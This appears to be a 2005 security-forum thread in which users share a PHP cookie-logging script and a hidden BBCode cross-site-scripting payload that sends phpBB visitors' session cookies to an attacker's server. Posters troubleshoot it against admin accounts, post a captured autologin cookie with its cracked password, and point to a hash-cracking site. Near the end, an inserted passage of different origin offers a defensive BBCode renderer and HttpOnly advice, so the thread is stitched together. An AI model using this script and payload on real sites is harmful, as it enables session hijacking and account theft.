IT Security and Insecurity Portal |

Posted: Sun Jul 10, 2005 1:05 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>
how about this one ?
rename it to cookies.php
and try to access it by http://mysite.com/cookies.php
and see what you have inside http://mysite.com/cookies.txt
;0 |

Posted: Sun Jul 10, 2005 1:14 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

using the code above.. rename it to cookies.php.. or whatever you want.
Code: | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
have fun |

Posted: Sun Jul 10, 2005 1:15 pm
verbatim | Regular user | Joined: Jul 09, 2005 | Posts: 11

when i call http://mysite.com/cookies.php
there's in cookies.txt :
Code: | Cookie: <br> IP: [color=#FF0000]myIP[/color]<br> Date and Time: 10 July, 2005, 3:11 pm<br> Referer: <br><br><br> |
but when i try to use the exploit with this new cookies.php :
Quote: | [url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite.com/cookies.php'+document.cookie;this.sss=null`style='font-size:0;][/url][/url]' |
the cookies.txt is empty
edit : i tried the syntax you gave while i was posting :
Code: | [color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://mysite/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color] |
And now it's working, great job subzero, i'd say you're certainly above (zero ). |

Posted: Sun Jul 10, 2005 1:30 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

Good then
only diff for that code was cookies.php?c=
happy hunting ;P pal |

Posted: Sun Jul 10, 2005 2:25 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

Ok i have something like this
REFERER=http://www.site.net/nothing/phpBB2/viewtopic.php?t=2
QUERY=phpbb2mysql_t=a:2:{i:1;i:1121004937;i:2;i:1121005196;}; phpbb2mysql_data=a:2:{s:11:"autologinid";s:32:"c2150783216c11afea291d179e7b1902";s:6:"userid";s:1:"2";}; phpbb2mysql_sid=b57ae9f7898f1ccebf7e07fa427e5998
AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
now what ? by what program/viewer i can use this cookie ?
c2150783216c11afea291d179e7b1902 is md5 hash ? |
|
Last edited by WaterBird on Sun Jul 10, 2005 2:39 pm; edited 1 time in total |

Posted: Sun Jul 10, 2005 2:37 pm
verbatim | Regular user | Joined: Jul 09, 2005 | Posts: 11

the password of this user : dupa400 |

Posted: Sun Jul 10, 2005 2:40 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

Posted: Sun Jul 10, 2005 2:51 pm
verbatim | Regular user | Joined: Jul 09, 2005 | Posts: 11

a "jpg cookie stealer" can't exist, because jpg is not executable... i presume antichat.ru redirects (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.
if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. |

Posted: Sun Jul 10, 2005 2:57 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

verbatim wrote: | a "jpg cookie stealer" can't exist, because jpg is not executable... i presume antichat.ru redirects (with .htaccess) http://antichat.ru/cgi-bin/s.jpg to the real stealer script.
if you want to use your own stealer script, you just have to read my discussion with subzero, the answer is in. |
Yep, i have tried that one, my cookie is empty !
Done the php file with
Code: |
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
header ("Location: /redirectpage.html");
?>
|
in same directory/path created empty cookies.txt file with CHMOD 777
and in post i add
Code: |
[color=#EFEFEF][url]www.ut[url=www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://www.site.com/cookies.php?c='+document.cookie;this.sss=null`style='font-size:0;][/url][/url]'[/color]
|
And when i see the post on admin account file cookies.txt is still empty. Any ideas ? |

Posted: Sun Jul 10, 2005 3:10 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

i think you're using mozilla ?? other than IE ?
i have no problem to see my own hash and i'm sure verbatim doesn't have a problem too
about the hash pass.
found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/ |

Posted: Sun Jul 10, 2005 3:13 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

subzero wrote: | i think you're using mozilla ?? other than IE ?
i have no problem to see my own hash and i'm sure verbatim doesn't have a problem too
about the hash pass.
found an online site that do cracking for u.
http://sarcaprj.wayreth.eu.org/ |
Thx for the hash pass cracker, but i still don't understand why this php doesn't want to work. i entered it by typing the url into my ie and i get:
Code: |
Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.
Please contact the server administrator, webmaster@site.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.
More information about this error may be available in the server error log.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
--------------------------------------------------------------------------------
Apache/1.3.33 Server at www.site.com Port 80
|
server info
Code: |
Operating system FreeBSD
Service Status Click to View
Kernel version 4.11-STABLE
Machine Type i386
Apache version 1.3.33 (Unix)
PERL version 5.8.5
Path to PERL /usr/bin/perl
Path to sendmail /usr/sbin/sendmail
Installed Perl Modules Click to View
PHP version 4.3.10
MySQL version 4.0.18
cPanel Build 10.2.0-CURRENT 89
Theme cPanel X v2.5.0
Documentation Click to View
cPanel Pro 1.0 (RC26)
|

Posted: Sun Jul 10, 2005 3:32 pm
subzero | Valuable expert | Joined: Mar 16, 2005 | Posts: 42

Code: |
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?> |
rename to cookies.php
and make new one cookies.txt
with chmod 777 inside the same directory.
i put mine in root directory /
mmm good luck. |

Posted: Sun Jul 10, 2005 3:52 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

ok i have put this php file in root directory and it's working thx :}
Btw to all interested maybe you know it but you don't have to post in topic or do a new one you can just send a msg to admin and paste the code in the msg :}
Cheers and thx for help !! Many thx ! |

Posted: Sun Jul 10, 2005 5:39 pm
WaterBird | Active user | Joined: May 16, 2005 | Posts: 37

Btw any idea how to fix this hole ? Phpbb doesn't know about it yet ? |
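
On the question of a fix: the payloads quoted in this thread place quote characters and a `style` attribute inside a nested `[url=...]` argument. The following is an added example, not phpBB's code or its actual patch, of rendering that tag so such input stays inert text; `render_url_bbcode()` and `SAFE_URL` are hypothetical names and the sample posts are constructed.

```php
<?php
// Added example (not phpBB's code). render_url_bbcode() and SAFE_URL are
// hypothetical names; the sample posts below are constructed.

// http(s) only, and only characters that cannot terminate an HTML attribute:
// no quotes, backticks, whitespace, angle brackets or square brackets.
const SAFE_URL = '~^https?://[A-Za-z0-9._\~:/?#@!$&*+,;=%-]+$~';

function render_url_bbcode(string $post): string
{
    // 1. Encode the whole post first, so user-supplied quotes and angle
    //    brackets can never reach the page as markup.
    $escaped = htmlspecialchars($post, ENT_QUOTES, 'UTF-8');

    // 2. Expand [url]...[/url] and [url=...]...[/url] in a single pass.
    //    The label may not contain brackets, so a tag nested inside another
    //    tag is never expanded, and generated HTML is not re-scanned.
    return preg_replace_callback(
        '~\[url(?:=([^\]\s]+))?\]([^\[\]]*)\[/url\]~i',
        function (array $m): string {
            $href = $m[1] !== '' ? $m[1] : $m[2];
            // Validate the decoded (raw) form against the allow-list.
            $raw = htmlspecialchars_decode($href, ENT_QUOTES);
            if (!preg_match(SAFE_URL, $raw)) {
                return $m[0]; // leave the tag as inert, already-encoded text
            }
            return '<a href="' . $href . '" rel="nofollow noopener">' . $m[2] . '</a>';
        },
        $escaped
    ) ?? $escaped;
}

// Constructed samples: one ordinary link, and one with the nested-tag shape
// quoted in this thread (script body replaced by a harmless placeholder).
$ok  = "[url=http://example.com/viewtopic.php?t=2&x=1]topic[/url]";
$bad = "[url]www.ut[url=www.s=''style='top:expression(PLACEHOLDER)'][/url][/url]'";

echo render_url_bbcode($ok), "\n";
echo render_url_bbcode($bad), "\n";

// The hostile post must yield no anchor element and no raw quote character.
$out = render_url_bbcode($bad);
assert(strpos($out, '<a ') === false && strpos($out, "'") === false);
assert(strpos(render_url_bbcode($ok), '<a href="http://example.com/') === 0);
```

Marking the forum's session and autologin cookies HttpOnly additionally keeps them out of `document.cookie`, which is what the payloads in this thread read.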

Posted: Sun Jul 10, 2005 5:48 pm
700G | Active user | Joined: Mar 25, 2005 | Posts: 33

Works very good |
All times are GMT